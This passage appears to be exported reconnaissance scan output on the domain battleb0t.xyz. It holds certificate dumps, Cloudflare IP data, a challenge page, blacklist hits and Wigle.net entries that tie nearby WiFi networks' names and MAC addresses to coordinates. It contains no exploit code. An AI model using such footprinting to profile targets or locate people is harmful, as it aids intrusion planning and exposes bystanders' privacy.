fe:3f:8c:4e:e3:30:bd:bb:06:89:38:c8:e8:4f:53:
3b:f6:63:c0:62:08:06:0e:e7:94:7f:f0:60:db:70:
ea:7f:78:d5:b9:6c:e0:49:a6:b4:37:75:b0:52:59:
b3:35:96:ab:99:46:f4:69:22:fd:0c:96:69:7a:42:
ab:47:42:08:6b:5e:8a:9a:4d:97:23:10:94:f7:79:
b4:c3:5e:97:52:71:2a:e0:cb:16:4d:05:9d:0a:4b:
32:05:28:18:33:7b:d6:34:6c:b7:3e:5b:ab:cb:54:
41:54:0f:0b:fa:c3:ea:b8:4b:80:0a:8e:f0:90:cd:
32:45:6e:24:6b:2b:da:60:08:2e:69:e6:59:89:a4:
25:87:82:03:c6:3c:bd:7c:46:55:91:56:df:8c:10:
3f:c4:bc:32:26:aa:2e:b1:d8:86:87:bf:32:be:e7:
49:d8:74:e0:99:42:34:64:c2:23:25:06:06:47:62:
f1:32:ce:42:2e:0b:a1:5c:5c:7d:55:6f:f5:43:b6:
4a:13:84:0e:20:9b:ad:e4:75:cf:98:ec:28:ca:d5:
97:e8:15:83:85:e3:c5:d8:e3:28:87:31:07:5e:2c:
11:d9:8a:d6:52:d3:ed:87:7d:ab:aa:dd:63:d0:48:
bb:c8:d0:2e:7e:92:84:13:37:53:61:b8:ec:ac:9a:
86:7b:ce:3f:d2:40:f0:db:6c:2c:1e:97:3b:c5:cb:
35:b4:86:6e:2c:94:d1:aa:dc:d2:87:31:ab:38:c5:
f4:27:1d:0a:25:44:99:80:36:03:ce:91:80:1c:d1:
59:d4:7c:5a:37:1b:0a:ce:f5:f1:c0:65:43:fc:ee:
ed:8e:bc:b1:d6:9d:85:ca:8e:38:b3:e3:c0:7f:97:
a5:98:eb:15:ff:cd:24:e7:6d:15:4d:57:89:17:a7:
5f:b4:d5:d3:b7:8f:07:9c:a8:ea:76:1e:e7:f3:2c:
9b:59:ae:2b:2b:2c:ad:9d:e2:f1:8d:94:c2:23:8f:
a7:4d:67:84:e7:2f:fb:e0:0a:d2:eb:7c:d9:ee:92:
a6:63:7b
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
20:59:35:73:F8:CD:0E:84:44:DD:6F:B0:C2:B9:45:18:98:00:40:7B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 13 13:50:48.097 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:CF:17:8C:E7:5C:85:D2:35:C0:73:1C:
DD:DC:CB:6A:69:22:6C:11:CA:4A:7A:70:E6:41:98:64:
C2:D6:EB:16:05:02:21:00:BB:55:01:DF:9D:AA:0D:1D:
85:02:D9:76:FB:4F:6B:D6:D8:8F:94:82:00:A7:D0:65:
5A:13:BE:6C:BF:BD:5B:9D
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Mar 13 13:50:48.131 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:AF:43:46:DF:38:C8:21:CA:47:16:D3:
84:F0:B4:A9:1B:09:0F:BB:55:58:89:44:1F:3A:9E:8A:
3C:22:70:0D:03:02:21:00:8B:39:10:8E:8A:36:DF:3F:
E7:32:3D:76:7C:AB:60:E8:18:70:D5:6D:0E:33:7A:97:
F4:0A:88:2E:3A:2E:C4:71
Signature Algorithm: sha256WithRSAEncryption
7c:6a:76:1d:db:1c:de:c2:19:6d:98:57:99:25:b4:5e:0f:bf:
95:8c:45:a2:25:ed:32:95:f2:0a:78:4e:ff:62:f4:67:48:31:
90:2b:e2:3c:d5:1d:db:e1:60:6a:0f:17:23:34:71:35:8b:95:
4d:73:cd:e3:a3:52:97:93:84:37:a2:ed:c5:7c:91:2b:0a:f9:
83:c1:eb:81:7e:88:34:cd:f0:88:f8:df:18:16:ef:ca:7e:49:
f2:a7:b7:0e:a3:4b:4e:4f:92:f3:51:0f:2b:4e:c0:52:1c:18:
2a:c7:b7:9d:09:65:0e:50:64:7a:7d:02:f3:86:ed:28:2c:cd:
4a:55:5f:32:f3:f6:3f:13:34:34:14:d8:2b:1d:6d:73:a0:41:
90:ec:31:52:17:e6:2f:8b:58:c6:fb:86:38:bb:08:6b:2a:fc:
64:0a:2b:2e:0f:f6:06:a5:76:85:8b:81:7c:0b:e7:7d:41:98:
29:67:65:9c:a3:5e:54:d7:42:a2:ca:57:e3:ed:40:b5:6b:e7:
20:ae:3b:11:70:76:c2:da:cf:31:f0:ab:ca:10:28:73:4e:36:
4a:79:71:99:ba:fe:41:29:e0:de:27:f3:42:87:08:d7:24:fe:
2c:3e:d4:01:c9:17:cd:e7:bc:a6:c4:72:63:d4:a6:ab:14:ea:
33:96:20:50
| battleb0t.xyz |
| 2023-05-12 03:01:08 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.118): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Av.AliBerksun (Net ID: 00:18:4D:47:67:DA) | 40.2024, 29.0398 |
| 2023-05-12 02:44:31 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:56:b0:2c:f1:37:ec:4d:fb:ba:29:5b:fe:cf:08:f7:c5:d3
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 27 17:49:55 2023 GMT
Not After : Apr 27 17:49:54 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:cb:71:f4:b8:7c:a4:30:09:1b:13:75:c6:c3:49:
0a:5a:97:35:c2:e3:b5:90:5b:a3:b9:e0:c8:a4:e3:
37:7a:a6:7e:1b:38:a5:5a:63:ab:b5:eb:db:f5:ce:
46:28:9a:bb:61:30:d2:f6:61:59:c2:0e:37:b3:85:
32:eb:67:93:5c:a2:8a:68:ae:c7:6a:b0:d0:9f:fc:
8d:d5:3b:0a:5d:17:21:49:98:a5:cc:cd:89:42:87:
4d:54:69:c0:91:34:ff:12:c3:4c:10:fb:89:47:3a:
b3:b5:ed:cc:06:52:eb:16:7a:af:b4:c5:22:00:43:
aa:8d:8b:68:61:04:b5:6e:86:7d:6f:23:6e:79:15:
3b:96:1c:92:ea:d1:76:1a:98:eb:67:69:53:a7:00:
db:63:83:56:0b:fc:db:8c:00:6a:64:27:99:81:0c:
e0:c2:14:78:8e:45:d2:05:23:4b:2e:a1:d6:90:83:
3d:eb:f6:16:04:b9:30:78:89:df:df:c5:c0:a5:c5:
60:dc:2c:82:50:e1:50:fc:88:d4:46:2d:16:9d:dd:
14:56:c3:31:55:0c:b7:cc:40:45:d8:f9:22:11:f9:
ed:60:df:5c:2f:a8:5f:17:ac:ff:7d:8a:1e:77:a6:
e8:15:cb:e0:33:32:29:69:ca:42:d7:15:49:3f:d9:
68:31:ef:59:a1:4e:f5:94:c3:75:47:24:20:25:4f:
22:0f:35:ad:2a:db:20:f0:5d:b9:c7:a2:17:d1:f3:
52:80:77:94:64:66:0d:72:a2:bf:aa:b0:5e:b6:d9:
af:81:4d:54:fa:3e:6b:7d:a8:7b:0d:08:23:70:3b:
37:ad:2b:75:bf:91:06:70:7f:c1:79:93:83:08:8c:
9a:bf:f2:64:ef:2f:39:42:b9:84:35:4b:b0:83:66:
5e:d7:c5:a7:06:f4:b4:89:e9:41:d1:09:1f:c3:66:
18:da:ea:4b:2f:9a:1a:d0:a2:05:8c:af:7f:ec:ae:
0f:17:00:fd:78:c7:64:b6:db:0c:73:e7:03:66:b3:
9e:9f:74:ea:0a:b7:ba:41:3e:89:fa:49:d9:69:26:
3c:0e:bc:77:f5:9f:cd:1d:0b:77:59:ba:57:e5:96:
24:24:9a:52:56:4e:63:31:d7:70:db:dc:4b:70:cb:
90:cd:e2:20:14:b5:fa:25:1b:2d:3b:39:de:26:c5:
3e:2d:95:63:5f:d6:2a:ba:87:f1:7a:9d:cc:8d:4d:
e8:02:34:63:08:c3:8a:65:36:2f:3d:9b:90:77:71:
2a:cc:26:26:c5:ad:9e:d8:4e:fb:7a:b2:ec:5f:c7:
b5:9a:b3:86:c9:5c:88:b7:8c:c8:3d:30:64:42:7f:
87:9a:b5
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
76:A0:A8:B9:3F:90:D7:08:DA:7E:1F:47:83:D5:88:5D:68:C9:9D:69
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 27 18:49:55.813 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:86:06:13:D6:59:74:98:67:AB:1E:5E:
35:81:72:04:C0:6A:1F:FC:7B:00:6F:B8:03:F1:BE:1B:
95:AB:B8:28:27:02:21:00:BC:93:E5:D5:C0:AB:C3:D9:
F0:70:98:2F:0B:66:FF:CE:EB:B1:93:B5:AF:E3:EC:E5:
24:C0:E0:01:07:FE:3F:C0
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Jan 27 18:49:55.791 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:EE:AA:37:8F:C9:30:00:92:D7:56:A4:
B6:CE:F3:F5:CF:29:81:16:83:11:DE:9E:A3:05:67:53:
91:6D:18:E7:A8:02:21:00:D8:7E:2B:BA:15:47:72:19:
DF:D8:EF:24:B0:25:79:A1:48:F8:3A:2F:C8:FB:0A:50:
3F:7F:81:1E:4F:CF:9B:26
Signature Algorithm: sha256WithRSAEncryption
54:17:5d:50:fa:47:51:89:f1:3d:5a:36:e8:d7:6e:d8:ae:85:
fe:d5:2e:dc:14:36:b2:f3:63:e0:57:da:ee:7f:c4:31:c7:24:
a6:e1:02:c4:6d:d7:20:80:18:28:5b:5e:4a:05:31:14:72:9e:
66:88:fd:41:57:c0:d0:ff:22:13:fd:7e:a3:d9:75:17:b4:67:
19:9a:e9:16:5e:44:4f:78:33:3a:4e:54:5f:6f:68:3b:1c:af:
d6:db:9b:bd:2a:b2:ea:76:7b:55:8a:a5:42:70:bd:16:d6:9e:
36:d7:56:22:2c:f3:d5:18:19:3e:f8:18:e5:da:a9:4e:03:a9:
13:d9:fb:8a:01:6e:70:f3:d9:fb:a9:8f:9a:38:b9:d7:89:2c:
9a:59:0a:bf:e9:71:d6:1c:2b:eb:93:fd:5b:0d:32:8d:ce:21:
6b:4e:a0:7b:68:bb:1b:49:02:64:07:cd:71:b7:fa:23:e8:c5:
12:86:a7:7c:6b:b8:cf:88:07:9a:b1:b0:e7:e8:80:0a:54:1c:
15:61:1e:50:90:fa:7e:93:82:0d:40:bf:16:d5:1e:1e:93:9f:
58:6f:56:5d:6c:49:c2:36:9e:81:7f:0e:32:d4:68:dd:6c:03:
64:48:28:01:66:a7:85:1f:9a:be:92:2f:5f:75:fe:d1:ff:94:
e2:b4:07:7b
| battleb0t.xyz |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 1 | 0 | 1 | 0 | None | CN=kekw.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | suddenlink.net-5263 (Net ID: 2C:99:24:25:52:61) | 37.751, -97.822 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-F3A2 (Net ID: 00:1D:D2:43:F3:A0) | 32.8608, -79.9746 |
| 2023-05-12 02:55:18 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | Ubuntu Linux | 46.101.229.70 |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
CF-RAY: 7c5ddd7eab1d10af-ORD
| 188.114.97.1 |
| 2023-05-12 03:24:29 | Company Name | No | Company Name Extractor | 0 | 0 | 3 | 0 | None | Cloudflare\, Inc. | C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | TrackmaniaLadder (Category: gaming)
https://en.tm-ladder.com/login_rech.php | login |
| 2023-05-12 03:00:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.56): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:0C:41:AC:F5:99) | 39.0469, -77.4903 |
| 2023-05-12 03:11:15 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'London', u'security': {u'is_vpn': False}, u'city_geoname_id': 2643743, u'region_geoname_id': 6269131, u'country': u'United States', u'region': u'England', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'CloudFLARENET-EU', u'organization_name': None, u'autonomous_system_number': 13335}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'W1B', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'22:11:14'}, u'latitude': 37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2a06:98c1:3121::1', u'continent': u'North America', u'region_iso_code': u'ENG'} | 2a06:98c1:3121::1 |
| 2023-05-12 02:50:26 | Raw Data from RIRs | No | GLEIF | 0 | 0 | 3 | 0 | None | [{u'relationships': {u'lei-records': {u'data': {u'type': u'lei-records', u'id': u'5493007DY18BGNLDWU14'}, u'links': {u'related': u'https://api.gleif.org/api/v1/lei-records/5493007DY18BGNLDWU14'}}}, u'attributes': {u'highlighting': u'<b>CLOUDFLARE</b>, <b>INC</b>.', u'value': u'CLOUDFLARE, INC.'}, u'type': u'autocompletions'}] | Cloudflare\, Inc. |
| 2023-05-12 02:44:15 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Node.js | nwapi2.battleb0t.xyz |
| 2023-05-12 02:56:50 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:03:e6:77:f0:fb:1d:de:0e:93:d2:d9:e5:40:98:fb:b1:42
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Nov 17 08:07:50 2022 GMT
Not After : Feb 15 08:07:49 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:b1:ca:c5:7f:45:88:ea:f6:98:9e:7e:93:33:29:
bd:74:fc:48:fe:29:e9:2a:62:8c:97:f1:93:16:6f:
19:da:24:7c:94:17:6e:35:5b:b2:ef:eb:77:ee:6f:
68:a3:10:bb:0d:f6:01:57:78:db:8f:85:23:65:1b:
8d:5a:d8:02:5e
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
26:F8:75:40:42:15:34:A1:4E:96:C0:96:27:7F:34:DA:52:69:CF:39
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: ecdsa-with-SHA384
30:64:02:30:30:65:da:98:dc:09:a7:4c:e4:33:3c:8a:ff:b4:
b6:a4:7c:dd:85:ba:d7:a9:30:8d:0e:63:cf:13:17:15:57:f9:
3b:12:68:dc:4b:97:91:0c:68:5e:6b:01:4b:4a:0f:a7:02:30:
78:5a:55:48:6e:2f:4f:60:b1:ea:bf:ab:1e:2c:b1:95:69:ea:
9d:d3:dc:5e:73:96:b4:1e:5a:b2:fd:e0:bd:42:cc:83:a6:42:
5c:5a:f3:1b:e0:65:96:82:07:eb:9c:bc
|
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.74): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | x-cache: HIT | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-ewr18140-EWR", "x-cache": "HIT", "x-github-request-id": "1AD4:4FA0:AFAB37:106D10A:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "47e9025f17d9e6e936d804b3c00d7989ec4a827a", "date": "Fri, 12 May 2023 02:54:12 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "559", "x-timer": "S1683860053.987504,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 02:54:13 | Web Content | No | Web Spider | 2 | 0 | 1 | 0 | None | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f60363a5a178c')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="49Idt7TVQjX1pBvRrI.6aeE3rlIvevuAC7b5vTR0YGE-1683860053-0-AY2CmFGtsZtnLcnB3KaVSnayJydAFpMBwiHerGE4rgR3JSYE2THMUlIcqEG1Ue8w91NqXc1_LHx6GFVlXiEAESIr_nGQ5go_qchKEn3Zd9LGEn7sjdr5MGswrCl99ImQfUgu6KdI_WivVs4bd90GT85W3eqgKUj3u0FUHAfgMsZls8XQdBKgHld4LM0wMOiwkj4Zv_skkfuoeKho_dzt4CkE8TkBrPt00M8eIbThaadGvVY0ZXacJCnFJrMWgEfguZYQYUBYVuQPCo4vsaoC9FJto9c6wa1TZj17T__0EGfb7iIg-Fe40vQL0GKl1g68OrtJF7bhLP5OSmmfJD-JBdOEbpA042KC5D5FyslCSfE7VL_rZtwmaMGkKhFs9rNjkGtzvRpQkvZRYfyEeWln9xUv2AoyKgo_1wsNTA_ve-XNzmkKtYDqJDpKDva2W3pJ_3486t1fxBPGklTfmIx9NlGkUpFz141VY7sqmJxOdPADiSQrKzSt-fovaHrioNcpkC_a9kgYIR8XX9ZtGjpkxl_IolwlzL--CdPxkW0zMtKJ-ob6rp2YNV1BUrgbluir9hqadqgAXGwt_gZWou60RMf3UaSZgv32iteEpLg55lWyX9LlrUvEr69WGY_mW2VC6sS9celjhcxiPOQLUkE6KOI9dyhMsK_hvZhX7dDzQsZTH4jAvHUf9CQD2LuSWPV3IPZysl2v0-TSOr10-QdcM27ziun4ot0DvTudFu8lZubQ6YgSwrTQ0wlCjvSq6gwpTOqihrt99F-QaEJWo9sY1ul0FhgMesYynTr4n3snoOM31ZGsLMXWKlkFnwUy1gZdrnW6lGoCkCZNGJjETZCrO0I1-blCIjRzIo6n3EQP7MT5qxAPdJn4-285kyLwMrAm9nW0Fi-T32j1LOogUb6WyPmjQkstsoGMIPyZHJWu0K53P0Hp3SPyKBDSdN4PFWJ5HhYglCXZ4frWkFfTdPf1mz5N5hMALh4FLKDLHit2KyOqpzy4LGkpslmmSQV9AzBKoRj1GEO_-FcLHTt9Y_hlt3lZHsDBr1qsBzb2CCXFE8o-Cu7OAduNH_CAS2sCSdUmt1KpWrCRaId6zphb5lrgZKo6-UG1p8eW6scfDanDgxE_uwAeJyjUHxAEdnSiE1KEwJ9jCVqAgp9dVVHeTI4rz44dE3vG-URKonk4rAmwzUrgRitO_d4uGYtEZ4E7qxVnEHPqSPPlSj7XCukbKVCLBJxrlSwrndqrFnPWXTVbd4VDbjuKYax1pPS7eYUGT_UeCCeppPOHUje3Psa1ejipoF94FUlnfTdlsYbhNQHOKrCLTleuO-lGh4FkydbCaYMbMeAAZyBt0xtAetQyd7ldNHUNuC2Nofi66SO1NL6dsaVskjPRRnE6ZvIpqMSXLJLgGQGDosioOi4TetnoLMpoodURiB_nIbRVwEcdjLeqlr_heAlhB9DjGpMi7U2THwVCr2WtE0eC7jgUi7EvjeNq152r1Qqg397yfToV5_wu059jWgynPgNUwC4lcn5G-MBIXveyQXm1Kc3wCLL9zpH8MAPvrg7a-sB2jNRF-Z6W26XqIgEKRCWc-Pxvv_Wf4vRraOQIcroiI7Bz-VZanQ8qRRCNJq9kL7QMtAUM-80bmDBTJgrVoo5PdyUEhsNJHqX9OXSul2XByOb4cFHCten8oYXlq-xQqbPW5cLy025uWQytdBIECEqK0e5vKcu_KE0Uj51a0tZyH3JcwbPPE_fH4pbZorm5Kg1q7pYpinkOp5o93d4llyQL17ps--AQEqRvOWDfy9ih2KJc_BE5lNLHq-v1h4WyL3qch3dFUNrf6TKv44d5E5ZODSf9MR91_YJ1LP3HF-0gnEEbwwFvu5w7kqPMreWbivd9zybQFoONhHZIvue3M
sgjfZ1vLvfzi0_pLzPV9XnL3aZnuVWNQ5m-tjTF6DVwD4heQQWtO8aBzn7YpoO7pmb5XcFPRZknXUl9vyibdHsym3ALRgx4Xf0sXY0Egq8vPrGtUmUt_qhEJTk5P3R0wsoRFa49pkuv79cmFbVV6UYUcsY_Ht1FZEPOAMMuij1BfHolOncuoa8HH91s4MToLK5e4ZXLCuwnrhU1Iz07g8_F8FiO-szvC0BSEfX52p_c3LsFOQ8KHGFOOtlIbkgQfFx7vErT1y0UZSuoR1HN5mwxz005itrk8qw-cU_4QXYVr0nnwhQQexYkVxHYLRxlHlGu9xonuO_9eyVCe8GyN79j4Enif4_dFDplAW77cjHRHWhMTCE5n_dU-96YMnkyFZr2m1KSUUWqQndQzduR6sMHEDQuErbPvLqIaJ3xphVgcTAzrMD12jvSU-bukvEL-wHHmzTDiCAItW9qw0XBzVZ7Ll736rJi4i9XorZ16wxKlOhw9SC6r707lQ43XMPgmmt8I71p5Y7NNqy-niBv8MJGeGRjObImH8n6JVBEQ7vEkMfTCD53zst2b-4V3RTMfSwntBlaoqZZYZdNBZBlFTqFK5PeKUk6cNexkn95wQmcJcuYO0vxq3IUpP6X">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '94216',
cRay: '7c5f60363a5a178c',
cHash: 'a8c2f7f784ba63b',
cUPMDTk: "\/?__cf_chl_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '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',
t: 'MTY4Mzg2MDA1My40NzkwMDA=',
m: 'X3NUo99x/4mGPFmrz69qVs5k5pJtmgeVcyYRkA87vXs=',
i1: 'Sn1NO9u6sfSr5lno+YjwEg==',
i2: 'LxAqQZecIh4w4zR/ETAJ7g==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f60363a5a178c');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f60363a5a178c';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
| ayhu.xyz |
| 2023-05-12 02:56:21 | Netblock Membership | No | RIPE | 0 | 0 | 2 | 0 | None | 87.248.157.0/24 | 87.248.157.102 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 29 | 0 | 2 | 0 | None | https://funny.battleb0t.xyz/ | funny.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:5D:96:FD) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:09:00 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.94 | 87.248.157.102 |
